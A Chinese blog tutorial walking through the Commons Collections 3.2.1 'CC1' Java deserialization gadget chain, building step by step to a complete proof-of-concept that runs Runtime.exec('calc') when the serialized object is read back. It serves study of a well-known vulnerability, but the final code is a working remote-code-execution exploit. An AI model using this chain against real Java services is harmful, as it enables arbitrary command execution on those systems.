Java反序列化Commons Collections1链

最新推荐文章于 2024-08-23 00:00:00 发布
最新推荐文章于 2024-08-23 00:00:00 发布
阅读量78 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46001025/article/details/133785063
版权

Commons Collections

Apache Commons是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。
Commons Collections包为Java标准的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。让我们在开发应用程序的过程中,既保证了性能,同时也能大大简化代码。

环境

jdk:1.7.0_10 https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html

CommonsCollections:3.2.1

分析的时候需要sun源码:https://sourceforge.net/projects/jdk7src/files/

pom.xml中写入,更新maven

    <dependencies>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

利用链

前置知识

Transformer就是变形金刚的英文名,是一个接口,定义了transform方法,实现类可以对对象进行一些操作。可以理解为一个装饰器或者代理

然后接下来要用到的类

● ConstantTransformer:它的transform()返回一个常量,也就是new时接收到的对象

● ChainedTransformer:它的transform()会链式调用上一个元素的transform(),也就是new时传进来的对象数组,前一个输出作为后一个输入

● InvokerTransformer:它的transform()会反射调用对象的方法,参数都可控

● TransformedMap

​ Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时,会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。

​ Apache Commons Collections中已经实现了一些常见的Transformer,其中有一个可以通过Java的反射机制来调用任意函数,叫做InvokerTransformer。

复现

如果是想挖掘一个反序列化的链子,那一般先找有危险方法的类,然后去构造链子

该链子是InvokerTransformer.transform()方法会反射加载任意类(可控)

接下来就一步一步弹计算器

首先我们用InvokerTransformer.transform():

        Runtime runtime = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
        invokerTransformer.transform(runtime);

找到会调用transform()的类,这里用TransformedMap类,它的checkSetValue()会调用transform(),但checkSetValue()是protect,仔细看可以发现TransformedMap是AbstractInputCheckedMapDecorator的子类

AbstractInputCheckedMapDecorator它的内部类MapEntry的setValue()方法调用了checkSetValue(),然后就可以用父类去访问子类的checkSetValue()

所以找哪里调用了setValue(),AnnotationInvocationHandler.readObject()调用了setValue(),但这个类是default类型的,需要反射

public class cc1 {
    public static void main(String[] args) throws Exception {
        Runtime runtime = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});

        Map map = new HashMap();
        map.put("111","222");
        Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,invokerTransformer);

//        for(Map.Entry entry:transformedMap.entrySet()){
//            entry.setValue(runtime);
//        }  
//这里可以理解一下,一个Entry就是HashMap遍历时的一个键值对,我们可以遍历HashMap,调用setValue(),但cc1还得用AnnotationInvocationHandler

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = c.getDeclaredConstructor(Class.class,Map.class);
        constructor.setAccessible(true);
        Object obj = constructor.newInstance(Override.class,transformerdmap);
        serialize(obj);
        deserialize();
	}
    
    public static void serialize(Object obj) throws IOException, ClassNotFoundException {
        FileOutputStream fos = new FileOutputStream("aa.ser");
        ObjectOutputStream os= new ObjectOutputStream(fos);
        os.writeObject(obj);
        os.close();
        fos.close();
    }
    
    public static void deserialize() throws IOException, ClassNotFoundException {
        FileInputStream fis = new FileInputStream("aa.ser");
        ObjectInputStream is = new ObjectInputStream(fis);
        is.readObject();
        is.close();
        fis.close();
    }
}

这样构造好了,但是反序列化是不成功的,目前构造的链有三个问题

● 之前我们的Runtime都是自己生成的,然而Runtime是不能被序列化的

● 在AnnotationInvocationHandler的readObject()中想要执行到setValue()是有if条件判断的

● AnnotationInvocationHandler.readObject()里面的setValue()里面的transform是不可控的

先解决第一个问题:

Class是可以被序列化的

//        Class c = Runtime.class;
//        Method getruntimemethod = c.getMethod("getRuntime",null);
//        Runtime r = (Runtime) getruntimemethod.invoke(null,null);
//        Method getexecmethod = c.getMethod("exec",String.class);
//        getexecmethod.invoke(r,"calc");  
// Runtime.getRuntime().exec()反射

//        Method getruntimemethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
//       Runtime getinvokemethod = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(getruntimemethod);
//        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(getinvokemethod);  
// InvokerTransformer的Runtime.getRuntime().exec()反射

        Transformer[] transformers = new Transformer[]{
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        chainedTransformer.transform(Runtime.class);
// 可以用ChainedTransformer来递归

第二个问题:

第一个if()会判断注解的成员变量的类型(需要找到一个有成员变量的注解),第二个if()会判断成员变量的值是否可以强转为成员变量的类型(这个不成立的)

map.put("111","222"); ==>map.put("value","222");
// 第一个if是根据ertry的键判断的
Object obj = constructor.newInstance(Override.class,transformerdmap); ==>Object obj = constructor.newInstance(Target.class,transformerdmap);
// Target注解有个value值

第三个问题:

可以利用ConstantTransformer这个类

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

最后完整的代码:

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;

import java.lang.reflect.Constructor;

import java.util.HashMap;
import java.util.Map;

/**
 * @data: 2022
 * @author: Lees
 * @since: JDK 11
 */

public class cc1 {
    public static void main(String[] args) throws Exception {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    
        Map<Object,Object> map = new HashMap<>();
        map.put("value","value");
        Map<Object,Object> transformerdmap = TransformedMap.decorate(map,null,chainedTransformer);
    
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = c.getDeclaredConstructor(Class.class,Map.class);
        constructor.setAccessible(true);
        Object obj = constructor.newInstance(Target.class,transformerdmap);
        serialize(obj);
        deserialize();    
    }
    
    public static void serialize(Object obj) throws IOException, ClassNotFoundException {
        FileOutputStream fos = new FileOutputStream("aa.ser");
        ObjectOutputStream os= new ObjectOutputStream(fos);
        os.writeObject(obj);
        os.close();
        fos.close();
    }
    
    public static void deserialize() throws IOException, ClassNotFoundException {
        FileInputStream fis = new FileInputStream("aa.ser");
        ObjectInputStream is = new ObjectInputStream(fis);
        is.readObject();
        is.close();
        fis.close();
    }
}

整个下来看不懂的话可以去看视频,up主讲的很好:
https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.788

LazyMap

前面分析的是TransformedMap的checkSetValue来利用的。接下来学习下ysoserial上的cc1,用的是LazpMap类。

id无
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java反序列化Commons-Collections2分析
weixin_45682070的博客
01-12 659
环境 JDK 1.7 Commons Collections 4.0 javassit maven所需pom <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dep
JAVA反序列化CommonCollections1利用
lt_xiaodou的博客
08-30 336
看到这里,是否有一种豁然开朗的感觉?到这里相信大家对上面的Demo原理已经了解了,但是现在有一个问题,我们在本机执行是可以执行代码了,但是怎么反序列化漏洞中来利用这个利用呢?通过上面的调用总结可以看出,这一套调用主要是围绕着Transformer接口的transform方法的,所以说要找到一个在readObject方法中能调用transform方法的地方。整篇文章总体思路是跟着P牛的文章思路来的,只不过因为基础薄弱很多地方都详细分析了一遍。...
[Java反序列化]—CommonsCollections1
Sentiment的博客
04-15 1075
前言 本篇进行CommonsCollections1 TransformedMap和LazyMap的学习。 动态代理 在分析LazyMap时会用到动态代理,所以先了解一下什么是动态代理,而了解动态代理前,先看下什么是代理和静态代理 代理 代理是一种常用的设计模式,其目的就是为其他对象提供一个代理以控制对某个对象的访问。代理类负责为委托类预处理消息,过滤消息并转发消息,以及进行消息被委托类执行后的后续处理。 代理可以理解为我们朋友圈中的代购,在买家与卖家间进行协调。 静态代理 要求被代理类和代理类同时实
Commons Collections Java反序列化漏洞深入分析
热门推荐
大树叶 技术专栏
04-27 1万+
http://www.myhack58.com/Article/html/3/62/2015/69493.htm 今年目前为止Java方面影响力最大的漏洞莫过于这段时间持续火热的CommonsCollections反序列化漏洞了。 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Com
Commons Collections反序列化
12-15
1. **构造恶意序列化对象**:攻击者首先创建一个实现了`java.io.Serializable`接口的类,其中包含恶意代码,如`java.lang.reflect.Method.invoke()`等可以执行任意操作的方法。 2. **序列化恶意对象**:将这个恶意...
java反序列化利用程序UI版Beta1.1.rar
07-20
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于将对象的状态转换为字节流,以便可以存储或在网络上传输。而反序列化则将这个字节...
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
Java反序列化安全漏洞防控
04-19
Java反序列化安全漏洞是一种严重的安全威胁,它主要发生在Java程序处理序列化数据时。序列化是Java中的一种机制,可以将对象状态转换为字节流,以便存储或传输。反序列化则是将字节流恢复为Java对象的过程。 在Java...
Java反序列化攻击
01-21
Java 反序列化攻击漏洞由FoxGlove 的近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。  由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,...
【Spring框架】
m0_71941456的博客
08-18 1038
Spring框架的功能远不止于此,它还包括Spring MVC、Spring Data、Spring Security等多个模块,每个模块都有其独特的应用场景。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 563
【代码】springboot网上商品订单转手系统bootpf
指针详解(四)
Limerence_Aries的博客
08-18 1029
目录1. 字符指针变量2. 数组指针变量3. 数组指针变初始化4. 二维数组传参的本质5. 函数指针变量1)函数指针变量的创建2)函数指针变量的使用3)代码解析6. typedef关键字7. 函数指针数组8. 转移表 代码const char* pstr = "hello bit."; 不是把字符串 hello bit 放到字符指针 pstr 里,而是把字符串hello bit.的首字符的地址放到了pstr中我们通过一道例题加深理解 所以数组指针变量:存放的应该是数组的地址,能够指向数组的指针变
android apk 加固后的地图加载异常及重新签名
calivnBao的博客
08-20 220
android apk 加固后的地图加载异常及重新签名
Java学习_18_Stream流
最新发布
qq_41136689的博客
08-23 940
博客仅记录个人学习进度和一些查缺补漏。学习内容:BV17F411T7Ao流的出现让数据处理从几十行代码缩减到一两行就能实现,简化了很多集合数组的操作。
微服务框架
Founder_Xiao_Xin的博客
08-20 770
在分布式系统中,服务可能失败导致雪崩,Hystrix 是防雪崩利器,具有服务降级、服务熔断、服务隔离、监控等防止雪崩的技术。服务降级:接口调用失败调用本地方法返回空。服务熔断:接口调用失败进入熔断方法返回错误信息。服务隔离:隔离服务之间相互影响。服务监控:记录服务调用的运行指标。在分布式系统中,一个业务因跨越不同数据库或不同微服务而包含多个子事务,要求所有子事务同时成功或失败,这就是分布式事务。例如某电商系统下单操作,需请求订单服务、账户服务、库存服务。
Javascript嵌套函数的调用
Cc040909的博客
08-17 774
闭包的嵌套函数就不同了,由于有两个函数,调用栈就标记为1, 表示内部还有函数,这个函数不知道什么时候才执行,所以js引擎就把他保存在内存中了。恰好第一个函数和第二个函数执行的时候,眼睛观察到的调用是看不到对象,所以执行的是默认绑定,都默认绑定在全局对象window上(浏览器环境)。上面这个总结的过程非常微妙,细节就在于嵌套的函数的分部执行过程,尽管内部函数嵌套在外部函数内,但是外部函数并没有影响内部函数的权利,内部函数的执行是不受外部函数控制的。外部函数和内部函数是两个不同的事件循环位置,独立调用的,
SpringBoot如何做自动配置
Z_DOUBLE_Y的博客
08-18 848
Spring Boot通过注解开启自动配置,对autoconfigured的jar包下的META-INF下的spring包中下的spring.factories文件进行扫描,这个文件中包含了可以进行自动配置的类,当满足@Condition注解指定的条件时,便在依赖的支持下进行实例化,注册到Spring容器中。用注解来对一些常规的配置做默认配置,简化了各种xml配置内容,使项目能够快速运行。
[笔记] hyperf event
BLOCKGOLD.E的博客
08-20 434
得益于组件的支撑,用户可以很方便的对以下事件进行监听。例如。接下来我们就实现一个记录SQL的监听器,来说一下怎么使用。首先我们定义好,实现接口并对类定义php/***//***/return [/***/if (!
Java反序列化入门:URLDNS与ysoserial利用
Java反序列化入门之URLDNS1讲解了Java序列化与反序列化的基本概念及其潜在的安全风险。在Java中,序列化是一种将对象转换为字节流的过程,以便在网络或存储中持久化数据。当对象被反序列化时,这些字节流被恢复为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值